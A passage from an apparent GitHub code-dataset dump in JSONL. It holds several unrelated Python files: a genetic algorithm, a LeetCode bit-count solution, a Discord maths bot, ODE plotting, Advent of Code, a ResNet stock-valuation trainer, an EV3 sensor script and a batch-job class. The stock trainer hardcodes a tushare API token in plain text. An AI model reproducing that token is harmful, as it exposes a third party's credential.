np.append(pop, children)\n pop = pop.reshape(n_ind+n_child, parents.shape[1])[new_idx, :]\n local_opt(pop, params, pop.size//20)\n return pop\n\n\ndef main():\n ex = \"f_libraries_of_the_world.txt\"\n data = Parser.read_in_file2(\"input/\"+ex)\n # best = d_opt(data)\n # print(fitness(np.array([best]), data))\n pop = None\n gens = 10\n con = \"Y\"\n while con.upper() == \"Y\":\n pop = run(50, gens, data, p_cross=0.5, p_mut=0.9, elitism=0.1, pop=pop)\n con = input(\"continue? Y/N\\n\")\n if con.upper() == \"Y\":\n gens = int(input(\"Number of generations: \"))\n best = pop[fitness(pop, data).argsort()[-1]]\n print([best, fitness(np.array([best]), data)])\n Parser.write_output_file2(\"output/\"+ex, best, data)\n\n\ndef b_opt(data):\n sort_idx = data[\"signup\"].argsort()\n return data[\"libs\"][sort_idx]\n\n\ndef d_opt(data):\n a = np.zeros(data[\"libs\"].size).astype(int)\n for lib in data[\"libs\"]:\n a[lib] = data[\"cumscore\"][lib][-1]\n sort_idx = np.argsort(a)\n return data[\"libs\"][sort_idx]\n\nmain()","repo_name":"Belpaire/HashCeud","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"5034434402","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 29 16:10:26 2020\n\n@author: andrew\n\"\"\"\n\nclass Solution:\n def hammingWeight(self, n: int) -> int:\n \n ans = 0\n while(n!=0):\n n &= (n-1)\n ans += 1\n return ans\n \n# 此题为技巧题 题意是一个无符号的int 变成二进制 有多少个1\n# &与的关系 特点 如果n和n-1连个数进行 &预算 \n# 如: 1010和 1001 &后 = 1000 即10和01 & 变为00\n# n 的每一次 &= 都会消除掉最末尾的1 所以消除几次变为0 就有几个1","repo_name":"Houchangxi/LeetCode-practice","sub_path":"191. Number of 1 Bits.py","file_name":"191. Number of 1 Bits.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"41115250921","text":"import discord\nfrom discord.ext import commands\nimport os\nfrom random import choice as random\nfrom io import BytesIO\nfrom urllib.parse import quote\nfrom aiohttp import ClientSession\nfrom sympy import latex\nfrom sympy.parsing.sympy_parser import parse_expr\nimport json\n\nLATEX_URL = (\n \"https://latex.codecogs.com/png.download?%5Cdpi%7B150%7D%20%5Cbg_white%20%5Chuge%20\"\n)\n\nwith open(\"resources/file.json\") as file:\n data = json.load(file)\n\nclass Maths(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command(\n brief=\"Generate Junior Mathematical Competition problem, usage: .jmc \"\n )\n async def jmc(self, ctx, year: int): # from years 2004 - 2018\n year = str(year)\n\n try:\n question = data[\"JMC\"][year][\"questions\"]\n except:\n await ctx.send(\"Sorry, can only be between 2004-2018\")\n return\n\n question = random(question)\n\n embed = discord.Embed(title=\"JMC-\"+year, colour=0x00008B)\n embed.set_image(url=question)\n \n await ctx.send(embed=embed)\n\n @commands.command(\n brief=\"Generate Intermediate Mathematical Competition problem, usage: .imc \"\n )\n async def imc(self, ctx, year: int): # from years 2004 - 2018\n year = str(year)\n\n try:\n question = data[\"IMC\"][year][\"questions\"]\n except:\n await ctx.send(\"Sorry, can only be between 2004-2018\")\n return\n\n question = random(question)\n\n embed = discord.Embed(title=\"IMC-\"+year, colour=0x00008B)\n embed.set_image(url=question)\n \n await ctx.send(embed=embed)\n \n\n @commands.command(\n brief=\"Generate Senior Mathematical Competition problem, usage: .smc \"\n )\n async def smc(self, ctx, year: int): # from years 2005 - 2018\n year = str(year)\n\n try:\n question = data[\"SMC\"][year][\"questions\"]\n except:\n await ctx.send(\"Sorry, can only be between 2005-2018\")\n return\n\n question = random(question)\n\n embed = discord.Embed(title=\"SMC-\"+year, colour=0x00008B)\n embed.set_image(url=question)\n \n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Latex\")\n async def latexify(self, ctx, expr: str):\n fixed_expr = expr.replace(\"^\", \"**\")\n try:\n parsed = parse_expr(fixed_expr, evaluate=False)\n except SyntaxError:\n await ctx.send(\"Invalid expression!\")\n else:\n ltx = latex(parsed)\n urlsafe = quote(ltx)\n async with ClientSession() as session:\n async with session.get(LATEX_URL + urlsafe) as resp:\n bytes_img = await resp.read()\n\n file = discord.File(fp=BytesIO(bytes_img), filename=\"latex.png\")\n await ctx.send(file=file)\n\ndef setup(client):\n client.add_cog(Maths(client))\n","repo_name":"RealJammy/The-Jambot","sub_path":"cogs/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"93"} +{"seq_id":"33667757345","text":"class Vehicles:\n def __init__(self):\n self.type = None\n self.speed = None\n self.color = None\n self.doors = 4\n\n def print_data(self):\n print(self.type, self.speed, self.color, self.doors)\n\n\nclass Cars(Vehicles):\n def __init__(self, type, speed, color):\n super().__init__()\n self.type = type\n self.speed = speed\n self.color = color\n\n\nclass Bike(Vehicles):\n def __init__(self, type, speed, color):\n super().__init__()\n self.type = type\n self.speed = speed\n self.color = color\n\n self.doors = None\n\n def print_data(self):\n print(\"Hello I'M a bike!\")\n\n\nmy_car = Cars(\"Audi\", 100, \"Red\")\nyour_car = Cars(\"Mercedes\", 150, \"Blue\")\n\nmy_bike = Bike(\"Csepel\", 10, \"White\")\n\nmy_car.print_data()\nyour_car.print_data()\n\nmy_bike.print_data()","repo_name":"robertvari/pycore-210109-3","sub_path":"06_inheritance.py","file_name":"06_inheritance.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"3425327430","text":"import math\nimport myLibrary as Lib\nimport matplotlib.pyplot as plt\n\ndef f(y,x):\n return (y*(math.log(y))/x)\neuexp1=Lib.forward_euler(f,math.exp(1),2,10,0.5)\neuexp2=Lib.forward_euler(f,math.exp(1),2,10,0.2)\neuexp3=Lib.forward_euler(f,math.exp(1),2,10,0.05)\nprcor1=Lib.predictor_corrector(f,math.exp(1),2,10,0.5)\nprcor2=Lib.predictor_corrector(f,math.exp(1),2,10,0.2)\nprcor3=Lib.predictor_corrector(f,math.exp(1),2,10,0.05)\n\n\nplt.plot(euexp1[0], euexp1[1])\nplt.plot(prcor1[0], prcor1[1])\nplt.title(\"y vs x (step size 0.5) \")\nplt.xlabel(\"y -->\")\nplt.ylabel(\"x -->\")\n\nplt.show()\nplt.plot(euexp2[0], euexp2[1])\nplt.plot(prcor2[0], prcor2[1])\nplt.title(\"y vs x (step size 0.2)\")\nplt.xlabel(\"x -->\")\nplt.ylabel(\"y -->\")\n\nplt.show()\n\nplt.plot(euexp3[0], euexp3[1])\nplt.plot(prcor3[0], prcor3[1])\nplt.title(\"y vs x (step size 0.05)\")\nplt.xlabel(\"x -->\")\nplt.ylabel(\"y -->\")\n\nplt.show()\n\n","repo_name":"hawexrutile/P346","sub_path":"CPLA7/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"23452767559","text":"input = open(\"input.txt\", \"r\")\ncrabs = []\n\n\nfor crab in input:\n crabs = crab.split(\",\")\ncount = 0\nfor crab in crabs:\n crabs[count] = int(crab)\n count += 1\n\nfewestFuel = [0, 0]\n\n\ni = 0\nfor crab in crabs:\n totalFuel = 0\n for crab in crabs:\n totalFuel += abs(crab - i)\n if fewestFuel[0] == 0:\n fewestFuel = [totalFuel, i]\n else:\n if fewestFuel[0] > totalFuel:\n fewestFuel = [totalFuel, i]\n else:\n pass\n i += 1\n\nprint(fewestFuel)\n","repo_name":"snail-brain/Advent2021","sub_path":"Day7/pt1.py","file_name":"pt1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"4464964013","text":"import torch.nn as nn\r\nimport torchvision\r\nimport numpy as np\r\nfrom torch.optim import Adam\r\nimport torch\r\nimport cv2\r\nimport os\r\nimport glob\r\nfrom torch.utils.data import Dataset, DataLoader, random_split\r\nimport tools\r\nimport get_train_image\r\nimport random\r\nimport torch.nn.functional as F\r\nfrom torchvision import models, transforms\r\nimport tushare as ts\r\nts.set_token('d7dc8dcedbac88a7179f9100c2b2d40b8a322dce8da6c080dc8d1c90')\r\npro = ts.pro_api()\r\npro = ts.pro_api('d7dc8dcedbac88a7179f9100c2b2d40b8a322dce8da6c080dc8d1c90')\r\n\r\n\r\nclass SelfDataSet(Dataset):\r\n def __init__(self, data_path):\r\n self.data_path = data_path\r\n self.imgs_path = glob.glob(os.path.join(data_path, '*.png'))\r\n\r\n\r\n def __getitem__(self, index):\r\n #读取图片和标签\r\n image_path = self.imgs_path[index]\r\n class_name = image_path.split('_')\r\n class_name = class_name[-1]\r\n class_name = class_name.split('.')\r\n class_name = int(class_name[0])\r\n class_name = np.array([class_name])\r\n class_name = class_name.astype(np.int64)\r\n label = torch.from_numpy(class_name)\r\n one_hot = torch.nn.functional.one_hot(label, num_classes=3)\r\n\r\n image = cv2.imread(image_path)\r\n image = image.reshape(3, 128, 128)\r\n return image, one_hot\r\n\r\n def __len__(self):\r\n return len(self.imgs_path)\r\n\r\n# Training function. We simply have to loop over our data iterator and feed the inputs to the network and optimize.\r\ndef train(num_epochs, batch_size):\r\n # Instantiate a neural network model\r\n # model = torch.load('vit_b_16_valuation_pt')\r\n model = torchvision.models.resnet18(num_classes=3)\r\n print(model)\r\n # Define your execution device\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n print(\"The model will be running on\", device, \"device\")\r\n # Convert model parameters and buffers to CPU or Cuda\r\n torch.backends.cudnn.benchmark = True\r\n model.to(device)\r\n #加载数据集\r\n train_dataset = SelfDataSet('valuation')\r\n train, valid = random_split(train_dataset,[0.7,0.3])\r\n train_loader = DataLoader(train, batch_size=batch_size, shuffle=True, num_workers=4, pin_memory=True)\r\n valid_loader = DataLoader(valid, batch_size=batch_size, shuffle=True, num_workers=4, pin_memory=True)\r\n # Define the loss function with Classification Cross-Entropy loss and an optimizer with Adam optimizer\r\n loss_fn = nn.CrossEntropyLoss()\r\n optimizer = Adam(model.parameters(), lr=0.01)\r\n min_valid_loss = float('inf')\r\n\r\n for e in range(num_epochs):\r\n train_loss = 0.0\r\n model.train() # Optional when not using Model Specific layer\r\n for data, labels in train_loader:\r\n data = data.to(device=device, dtype=torch.float32)\r\n labels = labels.to(device=device, dtype=torch.float32)\r\n\r\n optimizer.zero_grad()\r\n target = model(data)\r\n label_squeeze = torch.squeeze(labels, dim=1)\r\n loss = loss_fn(target, label_squeeze)\r\n loss.backward()\r\n optimizer.step()\r\n train_loss += loss.item()\r\n\r\n valid_loss = 0.0\r\n model.eval() # Optional when not using Model Specific layer\r\n for data, labels in valid_loader:\r\n data = data.to(device=device, dtype=torch.float32)\r\n labels = labels.to(device=device, dtype=torch.float32)\r\n\r\n target = model(data)\r\n label_squeeze = torch.squeeze(labels, dim=1)\r\n loss = loss_fn(target, label_squeeze)\r\n valid_loss = loss.item() * data.size(0)\r\n\r\n print(f'Epoch {e + 1} \\t\\t Training Loss: {train_loss / len(train_loader)} \\t\\t Validation Loss: {valid_loss / len(valid_loader)}')\r\n if min_valid_loss > valid_loss:\r\n print(f'Validation Loss Decreased({min_valid_loss:.6f}--->{valid_loss:.6f}) \\t Saving The Model')\r\n min_valid_loss = valid_loss\r\n # Saving State Dict\r\n torch.save(model, 'resnet18' + '.pt')\r\n\r\n # for epoch in range(num_epochs):\r\n # model.train()\r\n # running_loss = 0.0\r\n # i = 0\r\n # for image, label in train_loader:\r\n # optimizer.zero_grad(set_to_none=True)\r\n # image = image.to(device=device, dtype=torch.float32)\r\n # label = label.to(device=device, dtype=torch.float32)\r\n # pred=model(image)\r\n # label_squeeze = torch.squeeze(label, dim=1)\r\n # loss = loss_fn(pred, label_squeeze)\r\n # loss.backward()\r\n # i = i + 1\r\n # running_loss = running_loss+loss.item()\r\n # optimizer.step()\r\n # loss_avg_epoch = running_loss/i\r\n # print('epoch: %d avg loss: %f' % (epoch, loss_avg_epoch))\r\n # if loss_avg_epoch < bes_los:\r\n # bes_los = loss_avg_epoch\r\n # torch.save(model, 'resnet18_valuation_pt')\r\n\r\n\r\ndef random_append_samples():\r\n append_folder = 'append'\r\n if (os.path.exists(append_folder)) == False:\r\n os.mkdir(append_folder)\r\n append_folder = os.getcwd() + '//' + 'append'\r\n # 随机获取1995以后的训练数据\r\n date_today = tools.get_date_today()\r\n end_date = tools.get_delta_date(date_today, -183)\r\n trade_date_list = get_train_image.get_trade_date_list_period('19950101', end_date)\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n net = torch.load('resnet18.pt')\r\n ok_count = 0\r\n fail_count = 0\r\n while True:\r\n print('*********************')\r\n try:\r\n i = random.randint(0, len(trade_date_list))\r\n trade_date = trade_date_list[i]\r\n print(trade_date)\r\n ts_code_list = get_train_image.get_ts_code_list(trade_date)\r\n j = random.randint(0, len(ts_code_list))\r\n ts_code = ts_code_list[j]\r\n append_image_name = append_folder + '//' + ts_code + '_' + trade_date + '_out.png'\r\n #求取本季度和下一个季度的最大和最小收盘价\r\n start_date, _ = tools.get_season_border(trade_date, 0)\r\n _, end_date = tools.get_season_border(trade_date, 1)\r\n daily_data = pro.daily(ts_code=ts_code, start_date=start_date, end_date=end_date)\r\n # print(daily_data)\r\n max_price = daily_data['close'].max()\r\n idmax = daily_data['close'].idxmax()\r\n min_price = daily_data['close'].min()\r\n idmin = daily_data['close'].idxmin()\r\n\r\n class_label = 0\r\n if idmin <= idmax:\r\n class_label = 0\r\n if idmin > idmax:\r\n if (max_price-min_price)/min_price < 1.0:\r\n class_label = 1\r\n else:\r\n class_label = 2\r\n\r\n if os.path.exists(append_image_name):\r\n pass\r\n else:\r\n image_src = get_train_image.get_valuation_image(ts_code, trade_date)\r\n tran = transforms.ToTensor()\r\n image = tran(image_src)\r\n image = image.to(device=device, dtype=torch.float32)\r\n image = image.view(1, 3, 128 ,128)\r\n out = net(image)\r\n out = F.softmax(out, dim=1)\r\n out = out.cpu()\r\n out = out.detach().numpy()\r\n out = out[0]\r\n value_predict = 0.0\r\n for i in range(3):\r\n value_predict = value_predict + float(i)*out[i]\r\n print(class_label)\r\n print(out)\r\n # delta = abs((value_predict-value_estimate)/value_estimate)\r\n # if delta > 0.2:\r\n # append_image_name = append_image_name.replace('.png', '_' + str(int(price_estimate)) + '.png')\r\n # cv2.imwrite(append_image_name, image_src)\r\n # fail_count = fail_count + 1\r\n # else:\r\n # ok_count = ok_count + 1\r\n # print('fail:' + str(fail_count))\r\n # print('ok:' + str(ok_count))\r\n\r\n except:\r\n pass\r\nif __name__ == \"__main__\":\r\n # Let's build our model\r\n # train(num_epochs=2000, batch_size=32)\r\n random_append_samples()\r\n","repo_name":"heubme2020/middle_system","sub_path":"train_valuation.py","file_name":"train_valuation.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"17892900630","text":"t = int(input())\nwhile t > 0 :\n s = input()\n s = s+\" \"\n dem = 1\n for i in range(len(s)-1) :\n if s[i] == s[i+1] :\n dem+=1\n else :\n print(str(dem) + s[i] , end =\"\")\n dem = 1\n print()\n t-=1","repo_name":"trung11012002/Python-code-ptit","sub_path":"Ma_hoa_1.py","file_name":"Ma_hoa_1.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"10343504514","text":"#!/usr/bin/env pybricks-micropython\n\n# pybrick imports\nfrom pybricks import ev3brick as brick\nfrom pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,\n InfraredSensor, UltrasonicSensor, GyroSensor)\nfrom pybricks.parameters import (Port, Stop, Direction, Button, Color,\n SoundFile, ImageFile, Align)\nfrom pybricks.tools import wait, print\n\n\ndef displayColorValues(port):\n \"Continously prints color values at given port\"\n print(\"displayColorValues\")\n # creat the sensor object from the ColorSensor class\n sensor = ColorSensor(port)\n i = 0\n while True:\n # have four different ways of using this\n # sensor!\n color = sensor.color()\n print(i)\n i += 1\n # Color.BLACK, Color.BLUE, Color.GREEN, Color.YELLOW, Color.RED, Color.WHITE, Color.BROWN or None\n if color == Color.BLACK:\n c = \"Black\"\n elif color == Color.BLUE:\n c = \"Blue\"\n elif color == Color.GREEN:\n c = \"Green\"\n elif color == Color.YELLOW:\n c = \"Yellow\"\n elif color == Color.RED:\n c = \"Red\"\n elif color == Color.WHITE:\n c = \"White\"\n else:\n c = \"Unknown\"\n print(\"color = \", c) \n wait(1000)\n\ndef displayLightValue(port):\n \"Continously prints all values from color sensor at given port\"\n\n # creat the sensor object from the ColorSensor class\n sensor = ColorSensor(port)\n\n while True:\n # have four different ways of using this\n # sensor!\n color = sensor.color()\n reflection = sensor.reflection()\n ambient = sensor.ambient()\n rgb = sensor.rgb()\n print(\"color: \", color)\n print(\"reflection: \", reflection)\n print(\"ambient: \", ambient)\n print(\"rgb: \", rgb)\n wait(1000)\n\ndef printMsg(msg):\n print(msg)\n brick.display.text(msg)\n\ndef getSensorValue(sensor):\n return sensor.reflection()\n # return sensor.ambient()\n\ndef calibrateLightSensor(port):\n sensor = ColorSensor(port)\n \n # first display values\n btns = brick.buttons()\n while len(btns) == 0:\n r = getSensorValue(sensor)\n printMsg(\"value on port %d: %f\" % (port, r))\n printMsg(\"press any key\")\n wait(10)\n btns = brick.buttons()\n\n \n printMsg(\"place over dark, then press any key\")\n wait(2000)\n btns = brick.buttons()\n while len(btns) == 0:\n r = getSensorValue(sensor)\n btns = brick.buttons()\n\n low = r\n printMsg(\"dark value is %f \" % low)\n printMsg(\"light, press any key\")\n wait(2000)\n btns = brick.buttons()\n \n while len(btns) == 0:\n r = getSensorValue(sensor)\n btns = brick.buttons()\n\n high = r\n printMsg(\"highest value: %f\" % high)\n \n printMsg(\"calibrated values:\")\n wait(2000)\n btns = brick.buttons()\n while len(btns) == 0:\n r = getSensorValue(sensor)\n c = calibrateValue(r, low, high)\n btns = brick.buttons()\n printMsg(\"calibrated value: %f \" % c)\n wait(100)\n \n return low, high\n\ndef calibrateValue(value, low, high):\n height = high - low\n if height == 0:\n return 0.\n\n cal = (value / height) * 100.0\n cal = max(0., cal)\n cal = min(cal, 100.)\n\n return cal\n \n# display the light values in Port #2\n#port = Port.S2\n#displayLightValue(port)","repo_name":"pmargani/EV3Python","sub_path":"examples/lightSensor.py","file_name":"lightSensor.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"37126901039","text":"from __future__ import annotations\n\nimport time\nimport typing\n\nif typing.TYPE_CHECKING:\n from typing_extensions import Literal\n\n import polars as pl\n import toolcli\n import toolsql\n\nfrom . import spec\nfrom . import trackers\n\n\nclass Batch:\n name: str | None = None\n jobs: typing.Sequence[spec.JobData] | None = None\n\n #\n # # manadatory implementations\n #\n\n def execute_job(self, i: int) -> typing.Any:\n raise NotImplementedError()\n\n #\n # # __init__\n #\n\n def __init__(\n self,\n *,\n jobs: typing.Sequence[spec.JobData] | None = None,\n tracker: str | None = None,\n output_dir: str | None = None,\n output_filetype: str | None = None,\n outputs: spec.ShorthandOutputsSpec | None = None,\n db_config: toolsql.DBConfig | None = None,\n bucket_path: str | None = None,\n name: str | None = None,\n styles: toolcli.StyleTheme | None = None,\n verbose: bool = False,\n ) -> None:\n self.name = name\n self.jobs = jobs\n if styles is None:\n styles = {}\n self.styles = styles\n self.verbose = verbose\n self.tracker = trackers.create_tracker(\n tracker=tracker,\n output_dir=output_dir,\n output_filetype=output_filetype,\n outputs=outputs,\n db_config=db_config,\n bucket_path=bucket_path,\n batch=self,\n )\n\n #\n # # names\n #\n\n def get_job_list_name(self) -> str:\n if self.name is not None:\n return self.name\n else:\n return type(self).__name__\n\n def get_job_name(\n self,\n i: int | None = None,\n *,\n job_data: spec.JobData | None = None,\n parameters: typing.Mapping[str, str] | None = None,\n ) -> str:\n if job_data is None:\n if i is None:\n raise Exception('must specify job_data or i')\n job_data = self.get_job_data(i)\n\n if isinstance(job_data, (str, int, bool)):\n return self.get_job_list_name() + str(job_data)\n\n elif isinstance(job_data, dict):\n for key, value in job_data.items():\n if not isinstance(value, (str, int, bool)):\n raise NotImplementedError(\n 'must define job_name() for this type of job_data'\n )\n tokens = [\n key + '_' + job_data[key]\n for key, value in sorted(job_data.items())\n ]\n\n # add additional parameters to name\n if parameters is not None:\n for key, value in sorted(parameters.items()):\n tokens.append(key + '_' + value)\n\n return self.get_job_list_name() + '__'.join(tokens)\n\n else:\n raise NotImplementedError(\n 'must define get_job_name() for this type of job_data'\n )\n\n def parse_job_name(self, name: str) -> spec.JobData:\n job_data = {}\n for pair in name.split('__'):\n key, value = pair.split('_')\n job_data[key] = self._parse_name_token(value)\n return job_data\n\n @staticmethod\n def _parse_name_token(token: str) -> bool | int | str:\n try:\n return bool(token)\n except Exception:\n try:\n return int(token)\n except Exception:\n return token\n\n #\n # # job data\n #\n\n def get_n_jobs(self) -> int:\n if hasattr(self, 'jobs') and self.jobs is not None:\n return len(self.jobs)\n else:\n raise NotImplementedError(\n 'must specify jobs or implement get_n_jobs()'\n )\n\n def get_job_data(self, i: int) -> spec.JobData:\n if hasattr(self, 'jobs') and self.jobs is not None:\n return self.jobs[i]\n else:\n raise NotImplementedError(\n 'must specify jobs or implement get_job_data()'\n )\n\n #\n # # job completion\n #\n\n def get_remaining_jobs(self) -> typing.Sequence[int]:\n jobs = range(self.get_n_jobs())\n return [\n j\n for j, complete in enumerate(self.are_jobs_complete(jobs))\n if not complete\n ]\n\n def are_jobs_complete(\n self, indices: typing.Sequence[int]\n ) -> typing.Sequence[bool]:\n return [self.tracker.is_job_complete(i) for i in indices]\n\n #\n # # hashes\n #\n\n def get_job_hash(\n self, i: int | None = None, *, job_data: spec.JobData | None = None\n ) -> str:\n import hashlib\n import json\n\n if job_data is None:\n if i is None:\n raise Exception('must specify i or job_hash')\n job_data = self.get_job_data(i)\n job_data_str = json.dumps(job_data, sort_keys=True)\n job_hash = hashlib.md5(job_data_str.encode()).hexdigest()\n return job_hash\n\n def get_job_hashes(\n self,\n indices: typing.Sequence[int] | None = None,\n *,\n job_datas: typing.Sequence[typing.Any] | None = None,\n ) -> typing.Sequence[str]:\n if job_datas is None:\n if indices is None:\n indices = list(range(self.get_n_jobs()))\n job_datas = [self.get_job_data(i) for i in indices]\n return [self.get_job_hash(job_data) for job_data in job_datas]\n\n #\n # # execution\n #\n\n def orchestrate_jobs(\n self,\n executor: Literal['serial', 'parallel'] = 'parallel',\n n_processes: int | None = None,\n ) -> None:\n import tooltime\n\n self.print_status()\n\n # check whether to circuit break\n remaining_jobs = self.get_remaining_jobs()\n if len(remaining_jobs) == 0:\n print('\\nAll jobs already completed')\n return\n\n # print summary\n start_time = time.time()\n print()\n print()\n self.print_header('Running remaining jobs...')\n self.print_bullet(\n key='start time',\n value=tooltime.timestamp_to_iso_pretty(start_time),\n bullet_str='',\n )\n\n # execute jobs\n if executor == 'serial':\n self.serial_execute(jobs=remaining_jobs)\n elif executor == 'parallel':\n self.parallel_execute(jobs=remaining_jobs, n_processes=n_processes)\n else:\n raise Exception('unknown executor: ' + str(executor))\n\n # finalize\n self.print_conclusion(\n start_time=start_time,\n end_time=time.time(),\n jobs=remaining_jobs,\n )\n\n def serial_execute(self, jobs: typing.Sequence[int]) -> None:\n import tqdm\n\n color = self._get_progress_bar_color()\n for job in tqdm.tqdm(jobs, colour=color):\n self.run_job(job)\n\n def parallel_execute(\n self,\n jobs: typing.Sequence[int],\n n_processes: int | None = None,\n ) -> None:\n import concurrent.futures\n import tqdm\n\n color = self._get_progress_bar_color()\n with concurrent.futures.ProcessPoolExecutor(n_processes) as executor:\n futures = [executor.submit(self.run_job, i=job) for job in jobs]\n with tqdm.tqdm(total=len(jobs), colour=color) as pbar:\n for future in concurrent.futures.as_completed(futures):\n pbar.update(1)\n\n def _get_progress_bar_color(self) -> str | None:\n if self.styles is None:\n return None\n else:\n return self.styles.get('content')\n\n def run_job(self, i: int) -> None:\n self.start_job(i=i)\n self.execute_job(i=i)\n self.end_job(i=i)\n\n def start_job(self, i: int) -> None:\n pass\n\n def end_job(self, i: int) -> None:\n pass\n\n #\n # # times\n #\n\n def get_job_start_time(\n self, i: int | None = None, *, job_data: typing.Any | None = None\n ) -> int | float | None:\n raise NotImplementedError()\n\n def get_job_end_time(\n self, i: int | None = None, *, job_data: typing.Any | None = None\n ) -> int | float | None:\n raise NotImplementedError()\n\n def get_jobs_start_times(\n self,\n indices: typing.Sequence[int] | None = None,\n *,\n job_datas: typing.Sequence[typing.Any] | None = None,\n ) -> typing.Sequence[int | float | None]:\n if indices is not None:\n return [self.get_job_start_time(i=i) for i in indices]\n elif job_datas is not None:\n return [\n self.get_job_start_time(job_data=job_data)\n for job_data in job_datas\n ]\n else:\n raise Exception('must specify indices or job_datas')\n\n def get_jobs_end_times(\n self,\n indices: typing.Sequence[int] | None = None,\n *,\n job_datas: typing.Sequence[typing.Any] | None = None,\n ) -> typing.Sequence[int | float | None]:\n if indices is not None:\n return [self.get_job_end_time(i=i) for i in indices]\n elif job_datas is not None:\n return [\n self.get_job_end_time(job_data=job_data)\n for job_data in job_datas\n ]\n else:\n raise Exception('must specify indices or job_datas')\n\n #\n # # summary\n #\n\n def print_text_box(self, text: str) -> None:\n import toolstr\n\n toolstr.print_text_box(\n text,\n text_style=self.styles.get('metavar'),\n style=self.styles.get('content'),\n )\n\n def print_header(self, text: str) -> None:\n import toolstr\n\n toolstr.print_header(\n text,\n text_style=self.styles.get('metavar'),\n style=self.styles.get('content'),\n )\n\n def print_bullet(\n self, key: str, value: typing.Any, **kwargs: typing.Any\n ) -> None:\n import toolstr\n\n toolstr.print_bullet(key=key, value=value, styles=self.styles, **kwargs)\n\n def get_attribute_list(self) -> typing.Sequence[str]:\n attributes = list(vars(self).keys())\n if self.jobs is None:\n del attributes[attributes.index('jobs')]\n return attributes\n\n def get_formatted_attribute(self, key: str) -> str | None:\n return str(getattr(self, key))\n\n def print_status(self) -> None:\n import types\n import toolstr\n\n self.print_text_box('Collecting dataset ' + self.get_job_list_name())\n print()\n self.print_header('Parameters')\n self.print_bullet(key='n_jobs', value=self.get_n_jobs())\n toolstr.print_bullet(\n key='n_jobs_remaining',\n value=len(self.get_remaining_jobs()),\n )\n\n for obj, skip_keys in [\n (self, ['styles', 'tracker']),\n (self.tracker, ['batch']),\n ]:\n for parameter in obj.get_attribute_list(): # type: ignore\n if hasattr(obj, parameter):\n value = getattr(obj, parameter)\n else:\n value = None\n if (\n not parameter.startswith('_')\n and not isinstance(value, types.MethodType)\n and parameter not in skip_keys\n ):\n value_str = obj.get_formatted_attribute(parameter) # type: ignore\n if value_str is not None:\n self.print_bullet(key=parameter, value=value_str)\n\n self.print_additional_status()\n\n def print_additional_status(self) -> None:\n pass\n\n def print_conclusion(\n self,\n start_time: int | float,\n end_time: int | float,\n jobs: typing.Sequence[int],\n ) -> None:\n import toolstr\n import tooltime\n\n self.print_bullet(\n key='end time',\n value=' ' + tooltime.timestamp_to_iso_pretty(end_time),\n bullet_str='',\n )\n\n done_jobs = len([self.tracker.is_job_complete(i) for i in jobs])\n print()\n print(done_jobs, 'jobs completed')\n print()\n print()\n self.print_header('Execution Summary')\n\n duration = end_time - start_time\n seconds_per_job = duration / done_jobs\n jobs_per_second = done_jobs / duration\n jobs_per_minute = jobs_per_second * 60\n jobs_per_day = jobs_per_second * 86400\n self.print_bullet(\n 'duration',\n toolstr.format(duration, decimals=3) + ' seconds',\n )\n self.print_bullet(\n 'seconds per job',\n toolstr.format(seconds_per_job, decimals=3),\n )\n self.print_bullet(\n 'jobs per minute', toolstr.format(jobs_per_minute, decimals=2),\n )\n self.print_bullet(\n 'jobs per hour',\n toolstr.format(jobs_per_second * 86400 / 24, decimals=2),\n )\n self.print_bullet(\n 'jobs per day', toolstr.format(jobs_per_day, decimals=2),\n )\n self.print_additional_conclusion(\n start_time=start_time, end_time=end_time, jobs=jobs\n )\n\n def print_additional_conclusion(\n self,\n start_time: int | float,\n end_time: int | float,\n jobs: typing.Sequence[int],\n ) -> None:\n pass\n\n def summarize_jobs_per_second(self, sample_time: int = 60) -> pl.DataFrame:\n import polars as pl\n\n names = [self.get_job_name(i) for i in range(self.get_n_jobs())]\n times = [self.get_job_end_time(i) for i in range(self.get_n_jobs())]\n df = pl.from_dict({'job': names, 'times': times})\n df = df.with_columns(\n (pl.col('times') / sample_time).cast(int).alias('sample')\n )\n df = df.with_columns(\n [\n pl.col('job'),\n pl.count().over('sample').alias('jobs_per_second')\n / sample_time,\n ]\n )\n return df[['job', 'jobs_per_second']]\n\n def summarize_total_time(self) -> float | None:\n raw_times = self.get_jobs_end_times(list(range(self.get_n_jobs())))\n times = [float(time) for time in raw_times if time is not None]\n if len(times) > 0:\n return max(times) - min(times)\n else:\n return None\n\n","repo_name":"sslivkoff/tooljob","sub_path":"tooljob/batch_class.py","file_name":"batch_class.py","file_ext":"py","file_size_in_byte":14245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42842672271","text":"# Import libraries\r\nimport pandas as pd\r\nfrom scipy.interpolate import interp1d\r\nimport random\r\n\r\n\r\n# - - - Import data - - - \r\ndf = 